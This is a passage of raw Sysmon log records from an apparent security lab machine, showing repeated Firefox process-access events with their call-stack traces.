10341000x800000000000000017815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.722{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.722{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.722{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.722{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.691{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.691{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.691{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.691{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.691{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.972{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.972{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.972{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program 
Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.691{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla 
Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.691{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.691{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla 
Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.472{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla 
Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.472{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 
10341000x800000000000000017826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.472{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.425{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla 
Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.425{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla 
Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.425{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.394{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla 
